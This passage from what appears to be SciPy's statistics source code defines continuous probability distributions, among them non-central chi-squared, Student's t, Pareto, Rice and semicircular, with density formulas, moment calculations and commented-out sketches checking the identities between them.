`ncx2` takes ``df`` and ``nc`` as shape parameters.
%(after_notes)s
%(example)s
"""
def _argcheck(self, df, nc):
return (df > 0) & (nc >= 0)
def _rvs(self, df, nc):
return self._random_state.noncentral_chisquare(df, nc, self._size)
def _logpdf(self, x, df, nc):
cond = np.ones_like(x, dtype=bool) & (nc != 0)
return _lazywhere(cond, (x, df, nc), f=_ncx2_log_pdf, f2=chi2.logpdf)
def _pdf(self, x, df, nc):
# ncx2.pdf(x, df, nc) = exp(-(nc+x)/2) * 1/2 * (x/nc)**((df-2)/4)
# * I[(df-2)/2](sqrt(nc*x))
cond = np.ones_like(x, dtype=bool) & (nc != 0)
return _lazywhere(cond, (x, df, nc), f=_ncx2_pdf, f2=chi2.pdf)
def _cdf(self, x, df, nc):
cond = np.ones_like(x, dtype=bool) & (nc != 0)
return _lazywhere(cond, (x, df, nc), f=_ncx2_cdf, f2=chi2.cdf)
def _ppf(self, q, df, nc):
cond = np.ones_like(q, dtype=bool) & (nc != 0)
return _lazywhere(cond, (q, df, nc), f=sc.chndtrix, f2=chi2.ppf)
def _stats(self, df, nc):
val = df + 2.0*nc
return (df + nc,
2*val,
np.sqrt(8)*(val+nc)/val**1.5,
12.0*(val+2*nc)/val**2.0)
ncx2 = ncx2_gen(a=0.0, name='ncx2')
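# Commented-out sketch of the ``nc == 0`` fallback wired up through
# ``_lazywhere`` above (assumes SciPy): the non-central distribution
# degenerates to the central chi-squared:
#
#     import numpy as np
#     from scipy.stats import ncx2, chi2
#     x = np.linspace(0.5, 10, 5)
#     assert np.allclose(ncx2.pdf(x, 4, 0), chi2.pdf(x, 4))
#     assert np.allclose(ncx2.cdf(x, 4, 0), chi2.cdf(x, 4))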
class ncf_gen(rv_continuous):
r"""A non-central F distribution continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `ncf` is:
.. math::
f(x, n_1, n_2, \lambda) =
            \exp\left(-\frac{\lambda}{2} +
                      \lambda n_1 \frac{x}{2(n_1 x + n_2)}\right)
            n_1^{n_1/2} n_2^{n_2/2} x^{n_1/2 - 1} \\
            (n_2 + n_1 x)^{-(n_1 + n_2)/2}
            \gamma(n_1/2) \gamma(1 + n_2/2) \\
            \frac{L^{\frac{n_1}{2}-1}_{n_2/2}
                \left(-\lambda n_1 \frac{x}{2(n_1 x + n_2)}\right)}
            {B(n_1/2, n_2/2) \gamma(\frac{n_1 + n_2}{2})}
for :math:`n_1 > 1`, :math:`n_2, \lambda > 0`. Here :math:`n_1` is the
degrees of freedom in the numerator, :math:`n_2` the degrees of freedom in
the denominator, :math:`\lambda` the non-centrality parameter,
:math:`\gamma` is the logarithm of the Gamma function, :math:`L_n^k` is a
generalized Laguerre polynomial and :math:`B` is the beta function.
`ncf` takes ``df1``, ``df2`` and ``nc`` as shape parameters.
%(after_notes)s
%(example)s
"""
def _rvs(self, dfn, dfd, nc):
return self._random_state.noncentral_f(dfn, dfd, nc, self._size)
def _pdf_skip(self, x, dfn, dfd, nc):
        # ncf.pdf(x, df1, df2, nc) = exp(-nc/2 + nc*df1*x/(2*(df1*x+df2))) *
        #             df1**(df1/2) * df2**(df2/2) * x**(df1/2-1) *
        #             (df2+df1*x)**(-(df1+df2)/2) *
        #             gamma(df1/2)*gamma(1+df2/2) *
        #             L^{df1/2-1}_{df2/2}(-nc*df1*x/(2*(df1*x+df2))) /
        #             (B(df1/2, df2/2) * gamma((df1+df2)/2))
n1, n2 = dfn, dfd
term = -nc/2+nc*n1*x/(2*(n2+n1*x)) + sc.gammaln(n1/2.)+sc.gammaln(1+n2/2.)
term -= sc.gammaln((n1+n2)/2.0)
Px = np.exp(term)
Px *= n1**(n1/2) * n2**(n2/2) * x**(n1/2-1)
Px *= (n2+n1*x)**(-(n1+n2)/2)
Px *= sc.assoc_laguerre(-nc*n1*x/(2.0*(n2+n1*x)), n2/2, n1/2-1)
Px /= sc.beta(n1/2, n2/2)
# This function does not have a return. Drop it for now, the generic
# function seems to work OK.
def _cdf(self, x, dfn, dfd, nc):
return sc.ncfdtr(dfn, dfd, nc, x)
def _ppf(self, q, dfn, dfd, nc):
return sc.ncfdtri(dfn, dfd, nc, q)
def _munp(self, n, dfn, dfd, nc):
val = (dfn * 1.0/dfd)**n
term = sc.gammaln(n+0.5*dfn) + sc.gammaln(0.5*dfd-n) - sc.gammaln(dfd*0.5)
val *= np.exp(-nc / 2.0+term)
val *= sc.hyp1f1(n+0.5*dfn, 0.5*dfn, 0.5*nc)
return val
def _stats(self, dfn, dfd, nc):
# Note: the rv_continuous class ensures that dfn > 0 when this function
# is called, so we don't have to check for division by zero with dfn
# in the following.
mu_num = dfd * (dfn + nc)
mu_den = dfn * (dfd - 2)
mu = np.full_like(mu_num, dtype=np.float64, fill_value=np.inf)
np.true_divide(mu_num, mu_den, where=dfd > 2, out=mu)
mu2_num = 2*((dfn + nc)**2 + (dfn + 2*nc)*(dfd - 2))*(dfd/dfn)**2
mu2_den = (dfd - 2)**2 * (dfd - 4)
mu2 = np.full_like(mu2_num, dtype=np.float64, fill_value=np.inf)
np.true_divide(mu2_num, mu2_den, where=dfd > 4, out=mu2)
return mu, mu2, None, None
ncf = ncf_gen(a=0.0, name='ncf')
class t_gen(rv_continuous):
r"""A Student's t continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `t` is:
.. math::
f(x, \nu) = \frac{\Gamma((\nu+1)/2)}
{\sqrt{\pi \nu} \Gamma(\nu/2)}
(1+x^2/\nu)^{-(\nu+1)/2}
where :math:`x` is a real number and the degrees of freedom parameter
:math:`\nu` (denoted ``df`` in the implementation) satisfies
:math:`\nu > 0`. :math:`\Gamma` is the gamma function
(`scipy.special.gamma`).
%(after_notes)s
%(example)s
"""
def _argcheck(self, df):
return df > 0
def _rvs(self, df):
return self._random_state.standard_t(df, size=self._size)
def _pdf(self, x, df):
# gamma((df+1)/2)
# t.pdf(x, df) = ---------------------------------------------------
# sqrt(pi*df) * gamma(df/2) * (1+x**2/df)**((df+1)/2)
r = np.asarray(df*1.0)
Px = np.exp(sc.gammaln((r+1)/2)-sc.gammaln(r/2))
Px /= np.sqrt(r*np.pi)*(1+(x**2)/r)**((r+1)/2)
return Px
def _logpdf(self, x, df):
r = df*1.0
lPx = sc.gammaln((r+1)/2)-sc.gammaln(r/2)
lPx -= 0.5*np.log(r*np.pi) + (r+1)/2*np.log(1+(x**2)/r)
return lPx
def _cdf(self, x, df):
return sc.stdtr(df, x)
def _sf(self, x, df):
return sc.stdtr(df, -x)
def _ppf(self, q, df):
return sc.stdtrit(df, q)
def _isf(self, q, df):
return -sc.stdtrit(df, q)
def _stats(self, df):
mu = np.where(df > 1, 0.0, np.inf)
mu2 = _lazywhere(df > 2, (df,),
lambda df: df / (df-2.0),
np.inf)
mu2 = np.where(df <= 1, np.nan, mu2)
g1 = np.where(df > 3, 0.0, np.nan)
g2 = _lazywhere(df > 4, (df,),
lambda df: 6.0 / (df-4.0),
np.inf)
g2 = np.where(df <= 2, np.nan, g2)
return mu, mu2, g1, g2
t = t_gen(name='t')
class nct_gen(rv_continuous):
r"""A non-central Student's t continuous random variable.
%(before_notes)s
Notes
-----
If :math:`Y` is a standard normal random variable and :math:`V` is
an independent chi-square random variable (`chi2`) with :math:`k` degrees
of freedom, then
.. math::
X = \frac{Y + c}{\sqrt{V/k}}
has a non-central Student's t distribution on the real line.
The degrees of freedom parameter :math:`k` (denoted ``df`` in the
implementation) satisfies :math:`k > 0` and the noncentrality parameter
:math:`c` (denoted ``nc`` in the implementation) is a real number.
%(after_notes)s
%(example)s
"""
def _argcheck(self, df, nc):
return (df > 0) & (nc == nc)
def _rvs(self, df, nc):
sz, rndm = self._size, self._random_state
n = norm.rvs(loc=nc, size=sz, random_state=rndm)
c2 = chi2.rvs(df, size=sz, random_state=rndm)
return n * np.sqrt(df) / np.sqrt(c2)
def _pdf(self, x, df, nc):
n = df*1.0
nc = nc*1.0
x2 = x*x
ncx2 = nc*nc*x2
fac1 = n + x2
trm1 = n/2.*np.log(n) + sc.gammaln(n+1)
trm1 -= n*np.log(2)+nc*nc/2.+(n/2.)*np.log(fac1)+sc.gammaln(n/2.)
Px = np.exp(trm1)
valF = ncx2 / (2*fac1)
trm1 = np.sqrt(2)*nc*x*sc.hyp1f1(n/2+1, 1.5, valF)
trm1 /= np.asarray(fac1*sc.gamma((n+1)/2))
trm2 = sc.hyp1f1((n+1)/2, 0.5, valF)
trm2 /= np.asarray(np.sqrt(fac1)*sc.gamma(n/2+1))
Px *= trm1+trm2
return Px
def _cdf(self, x, df, nc):
return sc.nctdtr(df, nc, x)
def _ppf(self, q, df, nc):
return sc.nctdtrit(df, nc, q)
def _stats(self, df, nc, moments='mv'):
#
# See D. Hogben, R.S. Pinkham, and M.B. Wilk,
# 'The moments of the non-central t-distribution'
        # Biometrika 48, p. 465 (1961).
# e.g. https://www.jstor.org/stable/2332772 (gated)
#
mu, mu2, g1, g2 = None, None, None, None
gfac = sc.gamma(df/2.-0.5) / sc.gamma(df/2.)
c11 = np.sqrt(df/2.) * gfac
c20 = df / (df-2.)
c22 = c20 - c11*c11
mu = np.where(df > 1, nc*c11, np.inf)
mu2 = np.where(df > 2, c22*nc*nc + c20, np.inf)
if 's' in moments:
c33t = df * (7.-2.*df) / (df-2.) / (df-3.) + 2.*c11*c11
c31t = 3.*df / (df-2.) / (df-3.)
mu3 = (c33t*nc*nc + c31t) * c11*nc
g1 = np.where(df > 3, mu3 / np.power(mu2, 1.5), np.nan)
# kurtosis
if 'k' in moments:
c44 = df*df / (df-2.) / (df-4.)
c44 -= c11*c11 * 2.*df*(5.-df) / (df-2.) / (df-3.)
c44 -= 3.*c11**4
c42 = df / (df-4.) - c11*c11 * (df-1.) / (df-3.)
c42 *= 6.*df / (df-2.)
c40 = 3.*df*df / (df-2.) / (df-4.)
mu4 = c44 * nc**4 + c42*nc**2 + c40
g2 = np.where(df > 4, mu4/mu2**2 - 3., np.nan)
return mu, mu2, g1, g2
nct = nct_gen(name="nct")
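# Commented-out Monte Carlo sketch of the defining construction in the
# docstring, X = (Y + c) / sqrt(V/k) (assumes SciPy; the tolerance is loose,
# so this is illustrative rather than a strict test):
#
#     import numpy as np
#     from scipy.stats import nct, norm, chi2
#     rng = np.random.RandomState(42)
#     df, nc, n = 10, 1.5, 200000
#     y = norm.rvs(size=n, random_state=rng)
#     v = chi2.rvs(df, size=n, random_state=rng)
#     samples = (y + nc) / np.sqrt(v / df)
#     assert abs(samples.mean() - nct.mean(df, nc)) < 0.02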
class pareto_gen(rv_continuous):
r"""A Pareto continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `pareto` is:
.. math::
f(x, b) = \frac{b}{x^{b+1}}
for :math:`x \ge 1`, :math:`b > 0`.
`pareto` takes ``b`` as a shape parameter for :math:`b`.
%(after_notes)s
%(example)s
"""
def _pdf(self, x, b):
# pareto.pdf(x, b) = b / x**(b+1)
return b * x**(-b-1)
def _cdf(self, x, b):
return 1 - x**(-b)
def _ppf(self, q, b):
return pow(1-q, -1.0/b)
def _sf(self, x, b):
return x**(-b)
def _stats(self, b, moments='mv'):
mu, mu2, g1, g2 = None, None, None, None
if 'm' in moments:
mask = b > 1
bt = np.extract(mask, b)
mu = valarray(np.shape(b), value=np.inf)
np.place(mu, mask, bt / (bt-1.0))
if 'v' in moments:
mask = b > 2
bt = np.extract(mask, b)
mu2 = valarray(np.shape(b), value=np.inf)
np.place(mu2, mask, bt / (bt-2.0) / (bt-1.0)**2)
if 's' in moments:
mask = b > 3
bt = np.extract(mask, b)
g1 = valarray(np.shape(b), value=np.nan)
vals = 2 * (bt + 1.0) * np.sqrt(bt - 2.0) / ((bt - 3.0) * np.sqrt(bt))
np.place(g1, mask, vals)
if 'k' in moments:
mask = b > 4
bt = np.extract(mask, b)
g2 = valarray(np.shape(b), value=np.nan)
vals = (6.0*np.polyval([1.0, 1.0, -6, -2], bt) /
np.polyval([1.0, -7.0, 12.0, 0.0], bt))
np.place(g2, mask, vals)
return mu, mu2, g1, g2
    def _entropy(self, b):
        return 1 + 1.0/b - np.log(b)
pareto = pareto_gen(a=1.0, name="pareto")
class lomax_gen(rv_continuous):
r"""A Lomax (Pareto of the second kind) continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `lomax` is:
.. math::
f(x, c) = \frac{c}{(1+x)^{c+1}}
for :math:`x \ge 0`, :math:`c > 0`.
`lomax` takes ``c`` as a shape parameter for :math:`c`.
`lomax` is a special case of `pareto` with ``loc=-1.0``.
%(after_notes)s
%(example)s
"""
def _pdf(self, x, c):
# lomax.pdf(x, c) = c / (1+x)**(c+1)
return c*1.0/(1.0+x)**(c+1.0)
def _logpdf(self, x, c):
return np.log(c) - (c+1)*sc.log1p(x)
def _cdf(self, x, c):
return -sc.expm1(-c*sc.log1p(x))
def _sf(self, x, c):
return np.exp(-c*sc.log1p(x))
def _logsf(self, x, c):
return -c*sc.log1p(x)
def _ppf(self, q, c):
return sc.expm1(-sc.log1p(-q)/c)
def _stats(self, c):
mu, mu2, g1, g2 = pareto.stats(c, loc=-1.0, moments='mvsk')
return mu, mu2, g1, g2
def _entropy(self, c):
return 1+1.0/c-np.log(c)
lomax = lomax_gen(a=0.0, name="lomax")
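# Commented-out sketch of the special-case relationship stated in the
# docstring (assumes SciPy): ``lomax`` is ``pareto`` shifted by ``loc=-1``:
#
#     import numpy as np
#     from scipy.stats import lomax, pareto
#     x = np.linspace(0.0, 5, 6)
#     assert np.allclose(lomax.pdf(x, 2.5), pareto.pdf(x, 2.5, loc=-1.0))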
class pearson3_gen(rv_continuous):
r"""A pearson type III continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `pearson3` is:
.. math::
f(x, skew) = \frac{|\beta|}{\Gamma(\alpha)}
(\beta (x - \zeta))^{\alpha - 1}
\exp(-\beta (x - \zeta))
where:
.. math::
        \beta = \frac{2}{skew \cdot stddev}
\alpha = (stddev \beta)^2
\zeta = loc - \frac{\alpha}{\beta}
:math:`\Gamma` is the gamma function (`scipy.special.gamma`).
`pearson3` takes ``skew`` as a shape parameter for :math:`skew`.
%(after_notes)s
%(example)s
References
----------
    R.M. Vogel and D.E. McMartin, "Probability Plot Goodness-of-Fit and
Skewness Estimation Procedures for the Pearson Type 3 Distribution", Water
Resources Research, Vol.27, 3149-3158 (1991).
L.R. Salvosa, "Tables of Pearson's Type III Function", Ann. Math. Statist.,
Vol.1, 191-198 (1930).
"Using Modern Computing Tools to Fit the Pearson Type III Distribution to
Aviation Loads Data", Office of Aviation Research (2003).
"""
def _preprocess(self, x, skew):
# The real 'loc' and 'scale' are handled in the calling pdf(...). The
# local variables 'loc' and 'scale' within pearson3._pdf are set to
# the defaults just to keep them as part of the equations for
# documentation.
loc = 0.0
scale = 1.0
# If skew is small, return _norm_pdf. The divide between pearson3
# and norm was found by brute force and is approximately a skew of
# 0.000016. No one, I hope, would actually use a skew value even
# close to this small.
norm2pearson_transition = 0.000016
ans, x, skew = np.broadcast_arrays([1.0], x, skew)
ans = ans.copy()
# mask is True where skew is small enough to use the normal approx.
mask = np.absolute(skew) < norm2pearson_transition
invmask = ~mask
beta = 2.0 / (skew[invmask] * scale)
alpha = (scale * beta)**2
zeta = loc - alpha / beta
transx = beta * (x[invmask] - zeta)
return ans, x, transx, mask, invmask, beta, alpha, zeta
def _argcheck(self, skew):
# The _argcheck function in rv_continuous only allows positive
# arguments. The skew argument for pearson3 can be zero (which I want
# to handle inside pearson3._pdf) or negative. So just return True
# for all skew args.
return np.ones(np.shape(skew), dtype=bool)
def _stats(self, skew):
_, _, _, _, _, beta, alpha, zeta = (
self._preprocess([1], skew))
m = zeta + alpha / beta
v = alpha / (beta**2)
s = 2.0 / (alpha**0.5) * np.sign(beta)
k = 6.0 / alpha
return m, v, s, k
def _pdf(self, x, skew):
# pearson3.pdf(x, skew) = abs(beta) / gamma(alpha) *
# (beta * (x - zeta))**(alpha - 1) * exp(-beta*(x - zeta))
# Do the calculation in _logpdf since helps to limit
# overflow/underflow problems
ans = np.exp(self._logpdf(x, skew))
if ans.ndim == 0:
if np.isnan(ans):
return 0.0
return ans
ans[np.isnan(ans)] = 0.0
return ans
def _logpdf(self, x, skew):
# PEARSON3 logpdf GAMMA logpdf
# np.log(abs(beta))
# + (alpha - 1)*np.log(beta*(x - zeta)) + (a - 1)*np.log(x)
# - beta*(x - zeta) - x
        #   - sc.gammaln(alpha)                    - sc.gammaln(a)
ans, x, transx, mask, invmask, beta, alpha, _ = (
self._preprocess(x, skew))
ans[mask] = np.log(_norm_pdf(x[mask]))
ans[invmask] = np.log(abs(beta)) + gamma._logpdf(transx, alpha)
return ans
def _cdf(self, x, skew):
ans, x, transx, mask, invmask, _, alpha, _ = (
self._preprocess(x, skew))
ans[mask] = _norm_cdf(x[mask])
ans[invmask] = gamma._cdf(transx, alpha)
return ans
def _rvs(self, skew):
skew = broadcast_to(skew, self._size)
ans, _, _, mask, invmask, beta, alpha, zeta = (
self._preprocess([0], skew))
nsmall = mask.sum()
nbig = mask.size - nsmall
ans[mask] = self._random_state.standard_normal(nsmall)
ans[invmask] = (self._random_state.standard_gamma(alpha, nbig)/beta +
zeta)
if self._size == ():
ans = ans[0]
return ans
def _ppf(self, q, skew):
ans, q, _, mask, invmask, beta, alpha, zeta = (
self._preprocess(q, skew))
ans[mask] = _norm_ppf(q[mask])
ans[invmask] = sc.gammaincinv(alpha, q[invmask])/beta + zeta
return ans
pearson3 = pearson3_gen(name="pearson3")
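# Commented-out sketch of the small-skew transition implemented in
# ``_preprocess`` above (assumes SciPy): at ``skew=0`` the pdf is exactly
# normal:
#
#     import numpy as np
#     from scipy.stats import pearson3, norm
#     x = np.linspace(-3, 3, 7)
#     assert np.allclose(pearson3.pdf(x, 0.0), norm.pdf(x))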
class powerlaw_gen(rv_continuous):
r"""A power-function continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `powerlaw` is:
.. math::
f(x, a) = a x^{a-1}
for :math:`0 \le x \le 1`, :math:`a > 0`.
`powerlaw` takes ``a`` as a shape parameter for :math:`a`.
%(after_notes)s
`powerlaw` is a special case of `beta` with ``b=1``.
%(example)s
"""
def _pdf(self, x, a):
# powerlaw.pdf(x, a) = a * x**(a-1)
return a*x**(a-1.0)
def _logpdf(self, x, a):
return np.log(a) + sc.xlogy(a - 1, x)
def _cdf(self, x, a):
return x**(a*1.0)
def _logcdf(self, x, a):
return a*np.log(x)
def _ppf(self, q, a):
return pow(q, 1.0/a)
def _stats(self, a):
return (a / (a + 1.0),
a / (a + 2.0) / (a + 1.0) ** 2,
-2.0 * ((a - 1.0) / (a + 3.0)) * np.sqrt((a + 2.0) / a),
6 * np.polyval([1, -1, -6, 2], a) / (a * (a + 3.0) * (a + 4)))
def _entropy(self, a):
return 1 - 1.0/a - np.log(a)
powerlaw = powerlaw_gen(a=0.0, b=1.0, name="powerlaw")
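# Commented-out sketch of the special case noted in the docstring (assumes
# SciPy): ``powerlaw(a)`` coincides with ``beta(a, 1)``:
#
#     import numpy as np
#     from scipy.stats import powerlaw, beta
#     x = np.linspace(0.1, 0.9, 5)
#     assert np.allclose(powerlaw.pdf(x, 3.0), beta.pdf(x, 3.0, 1.0))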
class powerlognorm_gen(rv_continuous):
r"""A power log-normal continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `powerlognorm` is:
.. math::
f(x, c, s) = \frac{c}{x s} \phi(\log(x)/s)
(\Phi(-\log(x)/s))^{c-1}
where :math:`\phi` is the normal pdf, and :math:`\Phi` is the normal cdf,
and :math:`x > 0`, :math:`s, c > 0`.
`powerlognorm` takes :math:`c` and :math:`s` as shape parameters.
%(after_notes)s
%(example)s
"""
_support_mask = rv_continuous._open_support_mask
def _pdf(self, x, c, s):
# powerlognorm.pdf(x, c, s) = c / (x*s) * phi(log(x)/s) *
# (Phi(-log(x)/s))**(c-1),
return (c/(x*s) * _norm_pdf(np.log(x)/s) *
pow(_norm_cdf(-np.log(x)/s), c*1.0-1.0))
def _cdf(self, x, c, s):
return 1.0 - pow(_norm_cdf(-np.log(x)/s), c*1.0)
def _ppf(self, q, c, s):
return np.exp(-s * _norm_ppf(pow(1.0 - q, 1.0 / c)))
powerlognorm = powerlognorm_gen(a=0.0, name="powerlognorm")
class powernorm_gen(rv_continuous):
r"""A power normal continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `powernorm` is:
.. math::
f(x, c) = c \phi(x) (\Phi(-x))^{c-1}
where :math:`\phi` is the normal pdf, and :math:`\Phi` is the normal cdf,
and :math:`x >= 0`, :math:`c > 0`.
`powernorm` takes ``c`` as a shape parameter for :math:`c`.
%(after_notes)s
%(example)s
"""
def _pdf(self, x, c):
# powernorm.pdf(x, c) = c * phi(x) * (Phi(-x))**(c-1)
return c*_norm_pdf(x) * (_norm_cdf(-x)**(c-1.0))
def _logpdf(self, x, c):
return np.log(c) + _norm_logpdf(x) + (c-1)*_norm_logcdf(-x)
def _cdf(self, x, c):
return 1.0-_norm_cdf(-x)**(c*1.0)
def _ppf(self, q, c):
return -_norm_ppf(pow(1.0 - q, 1.0 / c))
powernorm = powernorm_gen(name='powernorm')
class rdist_gen(rv_continuous):
r"""An R-distributed continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `rdist` is:
.. math::
f(x, c) = \frac{(1-x^2)^{c/2-1}}{B(1/2, c/2)}
for :math:`-1 \le x \le 1`, :math:`c > 0`.
`rdist` takes ``c`` as a shape parameter for :math:`c`.
This distribution includes the following distribution kernels as
special cases::
c = 2: uniform
c = 4: Epanechnikov (parabolic)
c = 6: quartic (biweight)
c = 8: triweight
%(after_notes)s
%(example)s
"""
def _pdf(self, x, c):
# rdist.pdf(x, c) = (1-x**2)**(c/2-1) / B(1/2, c/2)
return np.power((1.0 - x**2), c / 2.0 - 1) / sc.beta(0.5, c / 2.0)
def _cdf(self, x, c):
term1 = x / sc.beta(0.5, c / 2.0)
res = 0.5 + term1 * sc.hyp2f1(0.5, 1 - c / 2.0, 1.5, x**2)
# There's an issue with hyp2f1, it returns nans near x = +-1, c > 100.
# Use the generic implementation in that case. See gh-1285 for
# background.
if np.any(np.isnan(res)):
return rv_continuous._cdf(self, x, c)
return res
def _munp(self, n, c):
numerator = (1 - (n % 2)) * sc.beta((n + 1.0) / 2, c / 2.0)
return numerator / sc.beta(1. / 2, c / 2.)
rdist = rdist_gen(a=-1.0, b=1.0, name="rdist")
class rayleigh_gen(rv_continuous):
r"""A Rayleigh continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `rayleigh` is:
.. math::
f(x) = x \exp(-x^2/2)
for :math:`x \ge 0`.
`rayleigh` is a special case of `chi` with ``df=2``.
%(after_notes)s
%(example)s
"""
_support_mask = rv_continuous._open_support_mask
def _rvs(self):
return chi.rvs(2, size=self._size, random_state=self._random_state)
def _pdf(self, r):
# rayleigh.pdf(r) = r * exp(-r**2/2)
return np.exp(self._logpdf(r))
def _logpdf(self, r):
return np.log(r) - 0.5 * r * r
def _cdf(self, r):
return -sc.expm1(-0.5 * r**2)
def _ppf(self, q):
return np.sqrt(-2 * sc.log1p(-q))
def _sf(self, r):
return np.exp(self._logsf(r))
def _logsf(self, r):
return -0.5 * r * r
def _isf(self, q):
return np.sqrt(-2 * np.log(q))
def _stats(self):
val = 4 - np.pi
return (np.sqrt(np.pi/2),
val/2,
2*(np.pi-3)*np.sqrt(np.pi)/val**1.5,
6*np.pi/val-16/val**2)
def _entropy(self):
return _EULER/2.0 + 1 - 0.5*np.log(2)
rayleigh = rayleigh_gen(a=0.0, name="rayleigh")
class reciprocal_gen(rv_continuous):
r"""A reciprocal continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `reciprocal` is:
.. math::
f(x, a, b) = \frac{1}{x \log(b/a)}
for :math:`a \le x \le b`, :math:`b > a > 0`.
`reciprocal` takes :math:`a` and :math:`b` as shape parameters.
%(after_notes)s
%(example)s
"""
def _argcheck(self, a, b):
return (a > 0) & (b > a)
def _get_support(self, a, b):
return a, b
def _pdf(self, x, a, b):
# reciprocal.pdf(x, a, b) = 1 / (x*log(b/a))
return 1.0 / (x * np.log(b * 1.0 / a))
def _logpdf(self, x, a, b):
return -np.log(x) - np.log(np.log(b * 1.0 / a))
def _cdf(self, x, a, b):
return (np.log(x)-np.log(a)) / np.log(b * 1.0 / a)
def _ppf(self, q, a, b):
return a*pow(b*1.0/a, q)
def _munp(self, n, a, b):
return 1.0/np.log(b*1.0/a) / n * (pow(b*1.0, n) - pow(a*1.0, n))
def _entropy(self, a, b):
return 0.5*np.log(a*b)+np.log(np.log(b*1.0/a))
reciprocal = reciprocal_gen(name="reciprocal")
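# Commented-out sketch (assumes SciPy): ``reciprocal`` is the log-uniform
# distribution, i.e. ``log(X)`` is uniform on ``[log(a), log(b)]``:
#
#     import numpy as np
#     from scipy.stats import reciprocal, uniform
#     x = np.array([2.0, 4.0, 8.0])
#     a, b = 1.0, 16.0
#     assert np.allclose(reciprocal.cdf(x, a, b),
#                        uniform.cdf(np.log(x), np.log(a), np.log(b) - np.log(a)))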
class rice_gen(rv_continuous):
r"""A Rice continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `rice` is:
.. math::
f(x, b) = x \exp(- \frac{x^2 + b^2}{2}) I_0(x b)
for :math:`x >= 0`, :math:`b > 0`. :math:`I_0` is the modified Bessel
function of order zero (`scipy.special.i0`).
`rice` takes ``b`` as a shape parameter for :math:`b`.
%(after_notes)s
The Rice distribution describes the length, :math:`r`, of a 2-D vector with
components :math:`(U+u, V+v)`, where :math:`U, V` are constant, :math:`u,
v` are independent Gaussian random variables with standard deviation
:math:`s`. Let :math:`R = \sqrt{U^2 + V^2}`. Then the pdf of :math:`r` is
``rice.pdf(x, R/s, scale=s)``.
%(example)s
"""
def _argcheck(self, b):
return b >= 0
def _rvs(self, b):
# https://en.wikipedia.org/wiki/Rice_distribution
t = b/np.sqrt(2) + self._random_state.standard_normal(size=(2,) +
self._size)
return np.sqrt((t*t).sum(axis=0))
def _cdf(self, x, b):
return sc.chndtr(np.square(x), 2, np.square(b))
def _ppf(self, q, b):
return np.sqrt(sc.chndtrix(q, 2, np.square(b)))
def _pdf(self, x, b):
# rice.pdf(x, b) = x * exp(-(x**2+b**2)/2) * I[0](x*b)
#
# We use (x**2 + b**2)/2 = ((x-b)**2)/2 + xb.
# The factor of np.exp(-xb) is then included in the i0e function
# in place of the modified Bessel function, i0, improving
# numerical stability for large values of xb.
return x * np.exp(-(x-b)*(x-b)/2.0) * sc.i0e(x*b)
def _munp(self, n, b):
nd2 = n/2.0
n1 = 1 + nd2
b2 = b*b/2.0
return (2.0**(nd2) * np.exp(-b2) * sc.gamma(n1) *
sc.hyp1f1(n1, 1, b2))
rice = rice_gen(a=0.0, name="rice")
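# Commented-out Monte Carlo sketch of the 2-D Gaussian-vector construction
# used in ``rice_gen._rvs`` and described in the docstring (assumes SciPy):
#
#     import numpy as np
#     from scipy.stats import rice
#     rng = np.random.RandomState(0)
#     b, n = 2.0, 200000
#     t = b / np.sqrt(2) + rng.standard_normal(size=(2, n))
#     samples = np.sqrt((t * t).sum(axis=0))
#     assert abs(samples.mean() - rice.mean(b)) < 0.01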
# FIXME: PPF does not work.
class recipinvgauss_gen(rv_continuous):
r"""A reciprocal inverse Gaussian continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `recipinvgauss` is:
.. math::
f(x, \mu) = \frac{1}{\sqrt{2\pi x}}
\exp\left(\frac{-(1-\mu x)^2}{2\mu^2x}\right)
for :math:`x \ge 0`.
`recipinvgauss` takes ``mu`` as a shape parameter for :math:`\mu`.
%(after_notes)s
%(example)s
"""
def _pdf(self, x, mu):
# recipinvgauss.pdf(x, mu) =
# 1/sqrt(2*pi*x) * exp(-(1-mu*x)**2/(2*x*mu**2))
return 1.0/np.sqrt(2*np.pi*x)*np.exp(-(1-mu*x)**2.0 / (2*x*mu**2.0))
def _logpdf(self, x, mu):
return -(1-mu*x)**2.0 / (2*x*mu**2.0) - 0.5*np.log(2*np.pi*x)
def _cdf(self, x, mu):
trm1 = 1.0/mu - x
trm2 = 1.0/mu + x
isqx = 1.0/np.sqrt(x)
return 1.0-_norm_cdf(isqx*trm1)-np.exp(2.0/mu)*_norm_cdf(-isqx*trm2)
def _rvs(self, mu):
return 1.0/self._random_state.wald(mu, 1.0, size=self._size)
recipinvgauss = recipinvgauss_gen(a=0.0, name='recipinvgauss')
class semicircular_gen(rv_continuous):
r"""A semicircular continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `semicircular` is:
.. math::
f(x) = \frac{2}{\pi} \sqrt{1-x^2}
for :math:`-1 \le x \le 1`.
%(after_notes)s
References
----------
.. [1] "Wigner semicircle distribution",
https://en.wikipedia.org/wiki/Wigner_semicircle_distribution
%(example)s
"""
def _pdf(self, x):
return 2.0/np.pi*np.sqrt(1-x*x)
def _cdf(self, x):
return 0.5+1.0/np.pi*(x*np.sqrt(1-x*x) + np.arcsin(x))
def _rvs(self):
# generate values uniformly distributed on the area under the pdf
# (semi-circle) by randomly generating the radius and angle
r = np.sqrt(self._random_state.random_sample(size=self._size))
a = np.cos(np.pi * self._random_state.random_sample(size=self._size))
return r * a
def _stats(self):
return 0, 0.25, 0, -1.0
def _entropy(self):
return 0.64472988584940017414
semicircular = semicircular_gen(a=-1.0, b=1.0, name="semicircular")
class skew_norm_gen(rv_continuous):
r"""A skew-normal random variable.
%(before_notes)s
Notes
-----
The pdf is::
skewnorm.pdf(x, a) = 2 * norm.pdf(x) * norm.cdf(a*x)
    `skewnorm` takes a real number :math:`a` as a skewness parameter.
When ``a = 0`` the distribution is identical to a normal distribution
(`norm`). `rvs` implements the method of [1]_.
%(after_notes)s
%(example)s
References
----------
.. [1] A. Azzalini and A. Capitanio (1999). Statistical applications of the
